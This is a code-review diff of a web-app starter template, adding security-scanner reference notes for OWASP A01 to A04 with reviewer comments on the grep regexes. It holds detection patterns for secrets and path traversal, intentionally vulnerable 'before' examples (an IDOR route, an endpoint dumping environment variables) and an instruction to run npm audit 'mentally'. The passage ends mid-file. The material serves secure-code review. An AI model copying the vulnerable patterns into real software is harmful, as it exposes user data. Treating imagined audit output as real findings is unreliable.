- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-split-combined-hooks.md +64 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-transitions.md +40 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-use-deferred-value.md +59 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-use-ref-transient-values.md +73 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-after-nonblocking.md +73 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-auth-actions.md +96 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-cache-lru.md +41 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-cache-react.md +76 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-dedup-props.md +65 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-hoist-static-io.md +149 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-no-shared-module-state.md +50 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-parallel-fetching.md +83 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-parallel-nested-fetching.md +34 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-serialization.md +38 -0
- package/template/.claude/skills/video-downloader/SKILL.md +42 -0
- package/template/.claude/skills/web-design-guidelines/SKILL.md +39 -0
- package/template/.claude/skills/webgpu-threejs-tsl/REFERENCE.md +371 -0
- package/template/.claude/skills/webgpu-threejs-tsl/SKILL.md +93 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/compute-shaders.md +578 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/core-concepts.md +497 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/device-loss.md +359 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/limits-and-features.md +133 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/materials.md +353 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/post-processing.md +515 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/wgsl-integration.md +324 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/basic-setup.js +87 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/custom-material.js +170 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/earth-shader.js +292 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/particle-system.js +259 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/post-processing.js +199 -0
- package/template/.claude/skills/webgpu-threejs-tsl/templates/compute-shader.js +343 -0
- package/template/.claude/skills/webgpu-threejs-tsl/templates/webgpu-project.js +276 -0
- package/template/.claude/skills/zoom-out/SKILL.md +7 -0
- package/template/.mcp.json +5 -0
- package/template/.nvmrc +1 -0
- package/template/.prettierignore +25 -0
- package/template/.prettierrc +11 -0
- package/template/.vscode/settings.json +1 -0
- package/template/.vscode/tasks.json.example +85 -0
- package/template/AGENTS.md +37 -0
- package/template/CLAUDE.md +75 -0
- package/template/CONTEXT.md +29 -0
- package/template/DESIGN.md +451 -0
- package/template/README.md +394 -0
- package/template/_gitignore +48 -0
- package/template/components.json +21 -0
- package/template/docker-compose.yml +9 -0
- package/template/docs/business/starter-prompt.md +94 -0
- package/template/docs/technical/ai/streaming.md +520 -0
- package/template/docs/technical/ai/structured-data.md +409 -0
- package/template/docs/technical/betterauth/polar.md +476 -0
- package/template/docs/technical/react-markdown.md +123 -0
- package/template/drizzle/0000_chilly_the_phantom.sql +50 -0
- package/template/drizzle/0001_last_warpath.sql +5 -0
- package/template/drizzle/meta/0000_snapshot.json +326 -0
- package/template/drizzle/meta/0001_snapshot.json +410 -0
- package/template/drizzle/meta/_journal.json +20 -0
- package/template/drizzle.config.ts +10 -0
- package/template/env.example +26 -0
- package/template/eslint.config.mjs +75 -0
- package/template/next-env.d.ts +6 -0
- package/template/next.config.ts +57 -0
- package/template/package.json +79 -0
- package/template/postcss.config.mjs +5 -0
- package/template/public/file.svg +1 -0
- package/template/public/globe.svg +1 -0
- package/template/public/next.svg +1 -0
- package/template/public/vercel.svg +1 -0
- package/template/public/window.svg +1 -0
- package/template/scripts/setup.ts +277 -0
- package/template/skills-lock.json +61 -0
- package/template/specs/ui-polish-responsive/README.md +59 -0
- package/template/specs/ui-polish-responsive/action-required.md +3 -0
- package/template/specs/ui-polish-responsive/requirements.md +53 -0
- package/template/specs/ui-polish-responsive/tasks/task-01-globals-css.md +144 -0
- package/template/specs/ui-polish-responsive/tasks/task-02-layout.md +66 -0
- package/template/specs/ui-polish-responsive/tasks/task-03-site-header.md +79 -0
- package/template/specs/ui-polish-responsive/tasks/task-04-site-footer.md +63 -0
- package/template/specs/ui-polish-responsive/tasks/task-05-home-page.md +215 -0
- package/template/specs/ui-polish-responsive/tasks/task-06-dashboard.md +222 -0
- package/template/specs/ui-polish-responsive/tasks/task-07-chat-page.md +225 -0
- package/template/specs/ui-polish-responsive/tasks/task-08-profile-page.md +192 -0
- package/template/specs/ui-polish-responsive/tasks/task-09-auth-pages.md +97 -0
- package/template/specs/ui-polish-responsive/tasks/task-10-setup-checklist.md +120 -0
- package/template/specs/ui-polish-responsive/tasks/task-11-starter-prompt-modal.md +87 -0
- package/template/src/app/(auth)/forgot-password/page.tsx +35 -0
- package/template/src/app/(auth)/layout.tsx +7 -0
- package/template/src/app/(auth)/login/page.tsx +44 -0
- package/template/src/app/(auth)/register/page.tsx +33 -0
- package/template/src/app/(auth)/reset-password/page.tsx +36 -0
- package/template/src/app/api/auth/[...all]/route.ts +4 -0
- package/template/src/app/api/chat/route.ts +80 -0
- package/template/src/app/api/diagnostics/route.ts +162 -0
- package/template/src/app/chat/error.tsx +46 -0
- package/template/src/app/chat/loading.tsx +42 -0
- package/template/src/app/chat/page.tsx +348 -0
- package/template/src/app/dashboard/loading.tsx +63 -0
- package/template/src/app/dashboard/page.tsx +79 -0
- package/template/src/app/error.tsx +44 -0
- package/template/src/app/favicon.ico +0 -0
- package/template/src/app/globals.css +175 -0
- package/template/src/app/layout.tsx +108 -0
- package/template/src/app/manifest.ts +21 -0
- package/template/src/app/not-found.tsx +28 -0
- package/template/src/app/page.tsx +152 -0
- package/template/src/app/profile/page.tsx +416 -0
- package/template/src/app/robots.ts +16 -0
- package/template/src/app/sitemap.ts +26 -0
- package/template/src/components/auth/forgot-password-form.tsx +83 -0
- package/template/src/components/auth/reset-password-form.tsx +107 -0
- package/template/src/components/auth/sign-in-button.tsx +97 -0
- package/template/src/components/auth/sign-out-button.tsx +31 -0
- package/template/src/components/auth/sign-up-form.tsx +121 -0
- package/template/src/components/auth/user-profile.tsx +91 -0
- package/template/src/components/setup-checklist.tsx +180 -0
- package/template/src/components/site-footer.tsx +24 -0
- package/template/src/components/site-header.tsx +46 -0
- package/template/src/components/starter-prompt-modal.tsx +202 -0
- package/template/src/components/theme-provider.tsx +11 -0
- package/template/src/components/ui/avatar.tsx +52 -0
- package/template/src/components/ui/badge.tsx +35 -0
- package/template/src/components/ui/button.tsx +58 -0
- package/template/src/components/ui/card.tsx +78 -0
- package/template/src/components/ui/dialog.tsx +142 -0
- package/template/src/components/ui/dropdown-menu.tsx +256 -0
- package/template/src/components/ui/github-stars.tsx +53 -0
- package/template/src/components/ui/input.tsx +20 -0
- package/template/src/components/ui/label.tsx +23 -0
- package/template/src/components/ui/mode-toggle.tsx +38 -0
- package/template/src/components/ui/separator.tsx +23 -0
- package/template/src/components/ui/skeleton.tsx +13 -0
- package/template/src/components/ui/sonner.tsx +42 -0
- package/template/src/components/ui/spinner.tsx +21 -0
- package/template/src/components/ui/textarea.tsx +17 -0
- package/template/src/hooks/use-diagnostics.ts +86 -0
- package/template/src/lib/auth-client.ts +16 -0
- package/template/src/lib/auth.ts +25 -0
- package/template/src/lib/db.ts +12 -0
- package/template/src/lib/env.ts +117 -0
- package/template/src/lib/schema.ts +82 -0
- package/template/src/lib/session.ts +48 -0
- package/template/src/lib/storage.ts +225 -0
- package/template/src/lib/utils.ts +6 -0
- package/template/src/proxy.ts +25 -0
- package/template/tsconfig.json +48 -0
|
@@ -0,0 +1,136 @@
|
|
|
1
|
+
# A01:2025 — Broken Access Control
|
|
2
|
+
|
|
3
|
+
## Overview
|
|
4
|
+
|
|
5
|
+
Broken Access Control is the #1 vulnerability in OWASP Top 10:2025. 100% of applications tested showed some form of broken access control. It encompasses 40 CWEs with 1,839,701 total occurrences and 32,654 CVEs. Access control enforces policy preventing users from exceeding their permissions — failures enable unauthorized data disclosure, modification, or destruction.
|
|
6
|
+
|
|
7
|
+
## Key CWEs
|
|
8
|
+
|
|
9
|
+
- **CWE-200**: Exposure of Sensitive Information to Unauthorized Actor
|
|
10
|
+
- **CWE-284**: Improper Access Control
|
|
11
|
+
- **CWE-285**: Improper Authorization
|
|
12
|
+
- **CWE-352**: Cross-Site Request Forgery (CSRF)
|
|
13
|
+
- **CWE-425**: Direct Request (Forced Browsing)
|
|
14
|
+
- **CWE-639**: Authorization Bypass Through User-Controlled Key (IDOR)
|
|
15
|
+
- **CWE-862**: Missing Authorization
|
|
16
|
+
- **CWE-863**: Incorrect Authorization
|
|
17
|
+
- **CWE-918**: Server-Side Request Forgery (SSRF)
|
|
18
|
+
- **CWE-22**: Path Traversal
|
|
19
|
+
|
|
20
|
+
## What to Look For
|
|
21
|
+
|
|
22
|
+
### General Patterns
|
|
23
|
+
- Routes/endpoints missing authentication middleware or guards
|
|
24
|
+
- Missing authorization/role checks on protected routes (any authenticated user can access admin routes)
|
|
25
|
+
- IDOR: user-controlled IDs in URLs or request bodies used to fetch records without ownership verification
|
|
26
|
+
- CORS misconfiguration (wildcard `*` or overly permissive origins)
|
|
27
|
+
- Directory traversal in file paths (user input used in `path.join`, `fs.readFile`, etc.)
|
|
28
|
+
- CSRF: state-changing operations (POST/PUT/DELETE) without CSRF token validation
|
|
29
|
+
- Privilege escalation: missing role checks, role stored client-side or in JWT without verification
|
|
30
|
+
- Force browsing: admin/debug/internal endpoints accessible without auth
|
|
31
|
+
|
|
32
|
+
### Grep Patterns
|
|
33
|
+
|
|
34
|
+
```
|
|
35
|
+
# Missing auth middleware on routes
|
|
36
|
+
Access-Control-Allow-Origin.*\*
|
|
37
|
+
Access-Control-Allow-Credentials.*true
|
|
38
|
+
|
|
39
|
+
# IDOR patterns — user-controlled ID without ownership check
|
|
40
|
+
params\.id|params\.userId|req\.query\.id
|
|
41
|
+
request\.getParameter\("acct"\)
|
|
42
|
+
findById|findOne.*id
|
|
43
|
+
|
|
44
|
+
# Path traversal
|
|
45
|
+
path\.join.*req\.|path\.resolve.*req\.
|
|
46
|
+
\.\.\/|\.\.\\
|
|
47
|
+
|
|
48
|
+
# Missing CSRF
|
|
49
|
+
method.*(POST|PUT|DELETE|PATCH)
|
|
50
|
+
csrf|csrfToken|_csrf
|
|
51
|
+
|
|
52
|
+
# Force browsing / unprotected admin
|
|
53
|
+
/admin|/debug|/internal|/api/admin
|
|
54
|
+
```
|
|
55
|
+
|
|
56
|
+
### JavaScript / TypeScript / Node.js
|
|
57
|
+
- Express/Next.js routes without auth middleware (`getSession`, `getServerSession`, `requireAuth`)
|
|
58
|
+
- API routes that read `params.id` or `query.id` and fetch records without checking ownership against session user
|
|
59
|
+
- `next.config.js` with permissive CORS headers
|
|
60
|
+
- Missing `withAuth` or session validation wrappers on API handlers
|
|
61
|
+
|
|
62
|
+
### Python (Django/Flask)
|
|
63
|
+
- Views without `@login_required` or `@permission_required` decorators
|
|
64
|
+
- `request.GET['id']` used directly in queries without ownership filter
|
|
65
|
+
- Missing `CSRF_COOKIE_SECURE` or `CSRF_COOKIE_HTTPONLY` settings
|
|
66
|
+
- `CORS_ALLOW_ALL_ORIGINS = True`
|
|
67
|
+
|
|
68
|
+
### Java (Spring)
|
|
69
|
+
- Controllers without `@PreAuthorize` or `@Secured` annotations
|
|
70
|
+
- Missing `SecurityFilterChain` configuration
|
|
71
|
+
- `@CrossOrigin(origins = "*")`
|
|
72
|
+
- Direct use of `request.getParameter()` in database queries without authorization
|
|
73
|
+
|
|
74
|
+
## Prevention Measures
|
|
75
|
+
|
|
76
|
+
1. Deny by default — restrict access except for public resources
|
|
77
|
+
2. Implement centralized, reusable access control mechanisms
|
|
78
|
+
3. Enforce record ownership — users can only access their own records
|
|
79
|
+
4. Apply business logic constraints through domain models
|
|
80
|
+
5. Disable directory listing; remove metadata/backups from web roots
|
|
81
|
+
6. Log access control failures; alert administrators on suspicious patterns
|
|
82
|
+
7. Rate limit API/controller access
|
|
83
|
+
8. Invalidate sessions server-side on logout; use short-lived JWTs
|
|
84
|
+
9. Include functional access control tests in unit and integration suites
|
|
85
|
+
|
|
86
|
+
## Example Attack Scenarios
|
|
87
|
+
|
|
88
|
+
**Scenario 1 — Parameter Tampering:**
|
|
89
|
+
```
|
|
90
|
+
https://example.com/app/accountInfo?acct=notmyacct
|
|
91
|
+
```
|
|
92
|
+
Attacker modifies the `acct` parameter to access any user's account.
|
|
93
|
+
|
|
94
|
+
**Scenario 2 — Forced Browsing:**
|
|
95
|
+
```
|
|
96
|
+
https://example.com/app/admin_getappInfo
|
|
97
|
+
```
|
|
98
|
+
Unauthenticated users access admin pages via direct URL.
|
|
99
|
+
|
|
100
|
+
**Scenario 3 — Client-Side Only Controls:**
|
|
101
|
+
```bash
|
|
102
|
+
curl https://example.com/app/admin_getappInfo
|
|
103
|
+
```
|
|
104
|
+
Frontend JavaScript protections bypassed via direct API calls.
|
|
105
|
+
|
|
106
|
+
## Fix Examples
|
|
107
|
+
|
|
108
|
+
**Before (IDOR vulnerability):**
|
|
109
|
+
```typescript
|
|
110
|
+
// Any authenticated user can access any note
|
|
111
|
+
export async function GET(req, { params }) {
|
|
112
|
+
const note = await db.get('SELECT * FROM notes WHERE id = ?', params.id);
|
|
113
|
+
return Response.json(note);
|
|
114
|
+
}
|
|
115
|
+
```
|
|
116
|
+
|
|
117
|
+
**After (ownership check):**
|
|
118
|
+
```typescript
|
|
119
|
+
export async function GET(req, { params }) {
|
|
120
|
+
const session = await getSession(req);
|
|
121
|
+
if (!session) return Response.json({ error: 'Unauthorized' }, { status: 401 });
|
|
122
|
+
const note = await db.get(
|
|
123
|
+
'SELECT * FROM notes WHERE id = ? AND user_id = ?',
|
|
124
|
+
[params.id, session.userId]
|
|
125
|
+
);
|
|
126
|
+
if (!note) return Response.json({ error: 'Not found' }, { status: 404 });
|
|
127
|
+
return Response.json(note);
|
|
128
|
+
}
|
|
129
|
+
```
|
|
130
|
+
|
|
131
|
+
## References
|
|
132
|
+
|
|
133
|
+
- [OWASP A01:2025](https://owasp.org/Top10/2025/A01_2025-Broken_Access_Control/)
|
|
134
|
+
- OWASP Proactive Controls: C1 Access Control
|
|
135
|
+
- OWASP ASVS V8 Authorization
|
|
136
|
+
- OWASP Authorization Cheat Sheet
|
|
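Review bot: The first group in the Grep Patterns block is headed `# Missing auth middleware on routes`, but the two expressions under it (`Access-Control-Allow-Origin.*\*` and `Access-Control-Allow-Credentials.*true`) are CORS checks, and the block has no pattern for the auth-middleware case at all. Rename that heading to `# CORS misconfiguration (wildcard origin, credentials enabled)`. Also add a line saying that routes missing `getSession`/`requireAuth` are found by absence, so every route handler has to be enumerated and checked rather than grepped for a match. The same caveat belongs on the `# Missing CSRF` group, where a hit on `method.*(POST|PUT|DELETE|PATCH)` is only a candidate until the handler is shown to lack a token check.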
@@ -0,0 +1,130 @@
|
|
|
1
|
+
# A02:2025 — Security Misconfiguration
|
|
2
|
+
|
|
3
|
+
## Overview
|
|
4
|
+
|
|
5
|
+
Security Misconfiguration is #2 in OWASP Top 10:2025. 100% of applications tested showed some form of misconfiguration with 719,084 total occurrences across 16 CWEs. This occurs when systems lack proper security setup — missing hardening, unnecessary features enabled, default credentials, verbose errors, or insecure settings.
|
|
6
|
+
|
|
7
|
+
## Key CWEs
|
|
8
|
+
|
|
9
|
+
- **CWE-16**: Configuration
|
|
10
|
+
- **CWE-260**: Password in Configuration File
|
|
11
|
+
- **CWE-489**: Active Debug Code
|
|
12
|
+
- **CWE-526**: Exposure of Environment Variables
|
|
13
|
+
- **CWE-547**: Use of Hard-Coded Security-Relevant Constants
|
|
14
|
+
- **CWE-611**: Improper Restriction of XML External Entity Reference
|
|
15
|
+
- **CWE-614**: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute
|
|
16
|
+
- **CWE-942**: Permissive Cross-domain Policy
|
|
17
|
+
- **CWE-1004**: Sensitive Cookie Without 'HttpOnly' Flag
|
|
18
|
+
|
|
19
|
+
## What to Look For
|
|
20
|
+
|
|
21
|
+
### General Patterns
|
|
22
|
+
- Debug/development mode enabled in production configs
|
|
23
|
+
- Default credentials left in code or config (admin/admin, root/root, test/test)
|
|
24
|
+
- Verbose error messages exposing stack traces, SQL queries, or internal paths to users
|
|
25
|
+
- Unnecessary features/services enabled (directory listing, debug endpoints, sample apps)
|
|
26
|
+
- Missing security headers (CSP, HSTS, X-Frame-Options, X-Content-Type-Options)
|
|
27
|
+
- Overly permissive CORS (Access-Control-Allow-Origin: *)
|
|
28
|
+
- Server/framework version headers enabled (X-Powered-By, Server)
|
|
29
|
+
- Hardcoded secrets in source code (API keys, passwords, tokens)
|
|
30
|
+
- Environment variables exposed via debug endpoints or error pages
|
|
31
|
+
- XML external entity processing enabled
|
|
32
|
+
|
|
33
|
+
### Grep Patterns
|
|
34
|
+
|
|
35
|
+
```
|
|
36
|
+
# Debug/development mode
|
|
37
|
+
DEBUG\s*=\s*[Tt]rue|debug\s*:\s*true|NODE_ENV.*development
|
|
38
|
+
poweredByHeader|x-powered-by
|
|
39
|
+
|
|
40
|
+
# Default credentials
|
|
41
|
+
admin.*admin|password.*password|root.*root|test.*test
|
|
42
|
+
default.*password|default.*credential
|
|
43
|
+
|
|
44
|
+
# Verbose errors returned to client
|
|
45
|
+
err\.stack|error\.stack|stackTrace|stack_trace
|
|
46
|
+
err\.message|error\.message|e\.getMessage
|
|
47
|
+
|
|
48
|
+
# Missing security headers
|
|
49
|
+
Content-Security-Policy|X-Frame-Options|X-Content-Type-Options
|
|
50
|
+
Strict-Transport-Security|Referrer-Policy
|
|
51
|
+
|
|
52
|
+
# Exposed environment/config
|
|
53
|
+
process\.env|os\.environ|System\.getenv
|
|
54
|
+
/debug|/health|/status|/info|/env|/actuator
|
|
55
|
+
|
|
56
|
+
# Hardcoded secrets
|
|
57
|
+
SECRET.*=.*['"]|API_KEY.*=.*['"]|PASSWORD.*=.*['"]
|
|
58
|
+
private_key|secret_key|access_token
|
|
59
|
+
```
|
|
60
|
+
|
|
61
|
+
### JavaScript / TypeScript / Node.js
|
|
62
|
+
- `next.config.js` with `poweredByHeader: true` or missing security headers
|
|
63
|
+
- Express without `helmet` middleware
|
|
64
|
+
- `.env` or `.env.local` files with secrets not in `.gitignore`
|
|
65
|
+
- Debug routes like `/api/debug` or `/api/health` exposing internal state
|
|
66
|
+
- `console.log` of sensitive config values
|
|
67
|
+
- Error handlers returning `err.stack` or `err.message` to client
|
|
68
|
+
|
|
69
|
+
### Python (Django/Flask)
|
|
70
|
+
- `DEBUG = True` in production settings
|
|
71
|
+
- `ALLOWED_HOSTS = ['*']`
|
|
72
|
+
- `SECRET_KEY` hardcoded in settings.py
|
|
73
|
+
- Flask debug mode: `app.run(debug=True)`
|
|
74
|
+
|
|
75
|
+
### Java (Spring)
|
|
76
|
+
- `spring.jpa.show-sql=true` in production
|
|
77
|
+
- Actuator endpoints exposed without authentication (`/actuator/env`, `/actuator/beans`)
|
|
78
|
+
- `server.error.include-stacktrace=always`
|
|
79
|
+
|
|
80
|
+
## Prevention Measures
|
|
81
|
+
|
|
82
|
+
1. Automate deployment of locked-down environments with unique credentials per environment
|
|
83
|
+
2. Remove unnecessary features, components, samples, and documentation
|
|
84
|
+
3. Review and update configurations with each security patch
|
|
85
|
+
4. Implement segmented architecture (containerization, cloud security groups)
|
|
86
|
+
5. Send security directives to clients via headers (CSP, HSTS, etc.)
|
|
87
|
+
6. Automate configuration verification across all environments
|
|
88
|
+
7. Centralize error handling — never expose stack traces or internal details to users
|
|
89
|
+
8. Use identity federation and short-lived credentials instead of static secrets
|
|
90
|
+
|
|
91
|
+
## Example Attack Scenarios
|
|
92
|
+
|
|
93
|
+
**Scenario 1:** Sample applications with known vulnerabilities remain on production servers. Default admin credentials unchanged.
|
|
94
|
+
|
|
95
|
+
**Scenario 2:** Directory listing enabled, allowing attackers to download compiled classes for reverse engineering.
|
|
96
|
+
|
|
97
|
+
**Scenario 3:** Detailed error messages with stack traces and component versions returned to users.
|
|
98
|
+
|
|
99
|
+
**Scenario 4:** Cloud storage defaults to public access, exposing sensitive data.
|
|
100
|
+
|
|
101
|
+
## Fix Examples
|
|
102
|
+
|
|
103
|
+
**Before (debug endpoint exposing environment):**
|
|
104
|
+
```typescript
|
|
105
|
+
export async function GET() {
|
|
106
|
+
return Response.json({
|
|
107
|
+
env: process.env,
|
|
108
|
+
nodeVersion: process.version,
|
|
109
|
+
uptime: process.uptime()
|
|
110
|
+
});
|
|
111
|
+
}
|
|
112
|
+
```
|
|
113
|
+
|
|
114
|
+
**After (remove debug endpoint entirely, or protect it):**
|
|
115
|
+
```typescript
|
|
116
|
+
// Delete the debug endpoint entirely in production.
|
|
117
|
+
// If needed for ops, protect with admin auth and filter sensitive values:
|
|
118
|
+
export async function GET(req) {
|
|
119
|
+
const session = await getAdminSession(req);
|
|
120
|
+
if (!session?.isAdmin) return Response.json({ error: 'Forbidden' }, { status: 403 });
|
|
121
|
+
return Response.json({ uptime: process.uptime(), nodeEnv: process.env.NODE_ENV });
|
|
122
|
+
}
|
|
123
|
+
```
|
|
124
|
+
|
|
125
|
+
## References
|
|
126
|
+
|
|
127
|
+
- [OWASP A02:2025](https://owasp.org/Top10/2025/A02_2025-Security_Misconfiguration/)
|
|
128
|
+
- OWASP Testing Guide: Configuration Management
|
|
129
|
+
- OWASP ASVS V13 Configuration
|
|
130
|
+
- CIS Security Configuration Guides
|
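--- a/package/template/.agents/skills/security-scanner/references/A03-software-supply-chain-failures.md
+++ b/package/template/.agents/skills/security-scanner/references/A03-software-supply-chain-failures.md
@@ -0,0 +1,117 @@
+# A03:2025 — Software Supply Chain Failures
+
+## Overview
+
+Software Supply Chain Failures is #3 in OWASP Top 10:2025. This category covers compromises in building, distributing, or updating software — vulnerabilities or malicious changes embedded in third-party code, tools, or dependencies. Notable incidents include SolarWinds (2019, 18,000 orgs compromised), Bybit ($1.5B theft, 2025), and Log4Shell (CVE-2021-44228).
+
+## Key CWEs
+
+- **CWE-937**: Using Components with Known Vulnerabilities
+- **CWE-1035**: Using Components from Untrusted Sources
+- **CWE-1104**: Use of Unmaintained Third-Party Components
+- **CWE-829**: Inclusion of Functionality from Untrusted Control Sphere
+- **CWE-494**: Download of Code Without Integrity Check
+- **CWE-506**: Embedded Malicious Code
+
+## What to Look For
+
+### General Patterns
+- Known vulnerable dependency versions in package manifests
+- Unpinned or wildcard dependency versions (`*`, `^`, `~` with major ranges)
+- CDN scripts loaded without Subresource Integrity (SRI) hashes
+- Missing lock files or significantly outdated lock files
+- Dependencies from unofficial or untrusted registries
+- No Software Bill of Materials (SBOM) tracking
+- Single-person deployment without review gates
+- CI/CD pipeline configs with weaker security than production
+- Transitive dependencies not tracked or audited
+
+### Grep Patterns
+
+```
+# Wildcard or loose versioning
+"\*"|"latest"|"\^0\."
+">="|"<="|"~"
+
+# CDN scripts without integrity
+<script.*src=.*cdn|<link.*href=.*cdn
+integrity=|crossorigin=
+
+# Known vulnerable patterns (check versions)
+lodash.*4\.17\.(0|1[0-1]) # prototype pollution
+axios.*0\.21\.[0-1] # SSRF
+jsonwebtoken.*[5-8]\. # various CVEs
+log4j.*2\.(0|1[0-6]) # Log4Shell
+
+# Package manifest files to check
+package\.json|requirements\.txt|Gemfile|go\.mod|pom\.xml|Cargo\.toml|\.csproj
+```
+
+### JavaScript / TypeScript / Node.js
+- Check `package.json` dependency versions against known CVEs
+- Look for `<script src="https://cdn...">` without `integrity` attribute in HTML/JSX
+- Run `npm audit` or `yarn audit` mentally — flag packages with known issues
+- Check for `package-lock.json` / `yarn.lock` existence and freshness
+- Flag use of deprecated packages (e.g., `request`, `querystring`)
+
+### Python
+- Check `requirements.txt` for pinned versions with known CVEs
+- Look for `pip install` without `--require-hashes`
+- Check for `Pipfile.lock` or `poetry.lock`
+
+### Java
+- Check `pom.xml` dependency versions against known CVEs
+- Look for `<repository>` entries pointing to unofficial Maven repos
+- Flag old Spring, Log4j, Jackson, or Apache Commons versions
+
+## Prevention Measures
+
+1. Generate and maintain Software Bill of Materials (SBOM)
+2. Track all direct and transitive dependencies
+3. Remove unused dependencies and unnecessary components
+4. Continuously monitor for CVEs (OWASP Dependency Check, Snyk, npm audit)
+5. Obtain components only from official, trusted sources via secure channels
+6. Implement Subresource Integrity (SRI) for all CDN-loaded resources
+7. Pin dependency versions and use lock files
+8. Implement staged rollouts, not simultaneous deployments
+9. Harden CI/CD pipelines with MFA and access controls
+10. Require code review for all changes before merge
+
+## Example Attack Scenarios
+
+**SolarWinds (2019):** Trusted vendor infiltrated — malware propagated to 18,000 orgs via software updates.
+
+**Log4Shell (2021):** CVE-2021-44228 in Apache Log4j enabled remote code execution, affecting millions of Java applications.
+
+**Shai-Hulud (2025):** First self-propagating npm worm infected 500+ package versions, harvesting developer credentials.
+
+## Fix Examples
+
+**Before (CDN without SRI):**
+```html
+<script src="https://cdn.example.com/lib.min.js"></script>
+```
+
+**After (CDN with SRI):**
+```html
+<script src="https://cdn.example.com/lib.min.js"
+integrity="sha384-abc123..."
+crossorigin="anonymous"></script>
+```
+
+**Before (loose dependency versions):**
+```json
+{ "lodash": "^4.17.0", "axios": "*" }
+```
+
+**After (pinned versions, updated):**
+```json
+{ "lodash": "4.17.21", "axios": "1.7.2" }
+```
+
+## References
+
+- [OWASP A03:2025](https://owasp.org/Top10/2025/A03_2025-Software_Supply_Chain_Failures/)
+- OWASP Dependency Check / Dependency Track
+- CycloneDX SBOM Standard
+- OWASP ASVS: Component Verification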
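Review bot: The version regexes under "Known vulnerable patterns" skip most of the releases they are meant to flag. `lodash.*4\.17\.(0|1[0-1])` matches 4.17.0, 4.17.10 and 4.17.11 but not 4.17.1–4.17.9 or 4.17.12–4.17.20, although the file's own fix example treats 4.17.21 as the safe pin; `log4j.*2\.(0|1[0-6])` likewise misses 2.1–2.9. Widen and terminate the alternations, e.g. `lodash.*4\.17\.([0-9]|1[0-9]|20)([^0-9]|$)` and `log4j.*2\.([0-9]|1[0-6])([^0-9]|$)`. The block should also say these expressions are only a first-pass filter, with `npm audit` or a dependency scanner as the authoritative check. The trailing `# …` annotations sit on the same line as each pattern and should move to their own comment lines so they are not pasted into the expression.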
@@ -0,0 +1,141 @@
|
|
|
1
|
+
# A04:2025 — Cryptographic Failures
|
|
2
|
+
|
|
3
|
+
## Overview
|
|
4
|
+
|
|
5
|
+
Cryptographic Failures is #4 in OWASP Top 10:2025 (down from #2). It covers failures related to lack of cryptography, insufficiently strong cryptography, leaking of cryptographic keys, and related errors. 32 CWEs mapped, 1,665,348 total occurrences, 2,185 CVEs.
|
|
6
|
+
|
|
7
|
+
## Key CWEs
|
|
8
|
+
|
|
9
|
+
- **CWE-261**: Weak Encoding for Password
|
|
10
|
+
- **CWE-319**: Cleartext Transmission of Sensitive Information
|
|
11
|
+
- **CWE-321**: Use of Hard-coded Cryptographic Key
|
|
12
|
+
- **CWE-326**: Inadequate Encryption Strength
|
|
13
|
+
- **CWE-327**: Use of Broken or Risky Cryptographic Algorithm
|
|
14
|
+
- **CWE-328**: Reversible One-Way Hash
|
|
15
|
+
- **CWE-330**: Use of Insufficiently Random Values
|
|
16
|
+
- **CWE-338**: Use of Cryptographically Weak PRNG
|
|
17
|
+
- **CWE-759**: Use of One-Way Hash Without a Salt
|
|
18
|
+
- **CWE-916**: Use of Password Hash With Insufficient Computational Effort
|
|
19
|
+
|
|
20
|
+
## What to Look For
|
|
21
|
+
|
|
22
|
+
### General Patterns
|
|
23
|
+
- Weak hashing algorithms used for passwords (MD5, SHA1, SHA256 without key stretching)
|
|
24
|
+
- Missing salt in password hashing
|
|
25
|
+
- Hardcoded cryptographic keys, secrets, or API keys in source code
|
|
26
|
+
- Sensitive data transmitted without encryption (HTTP, FTP, SMTP)
|
|
27
|
+
- Weak random number generation for security tokens (Math.random, rand())
|
|
28
|
+
- Cookies missing `Secure` flag (sent over HTTP)
|
|
29
|
+
- Sensitive data in logs (passwords, tokens, credit cards, PII)
|
|
30
|
+
- Base64 encoding used as "encryption" for tokens or secrets
|
|
31
|
+
- Deprecated crypto algorithms (DES, 3DES, RC4, MD5, SHA1)
|
|
32
|
+
- Missing HSTS headers
|
|
33
|
+
- Hardcoded IVs or nonces in encryption
|
|
34
|
+
|
|
35
|
+
### Grep Patterns
|
|
36
|
+
|
|
37
|
+
```
|
|
38
|
+
# Weak hashing
|
|
39
|
+
createHash\(['"]md5['"]\)|createHash\(['"]sha1['"]\)
|
|
40
|
+
hashlib\.md5|hashlib\.sha1
|
|
41
|
+
MessageDigest\.getInstance\(['"]MD5['"]\)|MessageDigest\.getInstance\(['"]SHA-1['"]\)
|
|
42
|
+
md5\(|sha1\(
|
|
43
|
+
|
|
44
|
+
# Weak randomness
|
|
45
|
+
Math\.random|random\.random|rand\(\)|Random\(\)
|
|
46
|
+
uuid.*v1|Date\.now
|
|
47
|
+
|
|
48
|
+
# Hardcoded secrets/keys
|
|
49
|
+
SECRET.*=\s*['"][^'"]{8,}|KEY.*=\s*['"][^'"]{8,}|PASSWORD.*=\s*['"][^'"]{4,}
|
|
50
|
+
private.?key|secret.?key|api.?key|access.?token
|
|
51
|
+
|
|
52
|
+
# Base64 as "encryption"
|
|
53
|
+
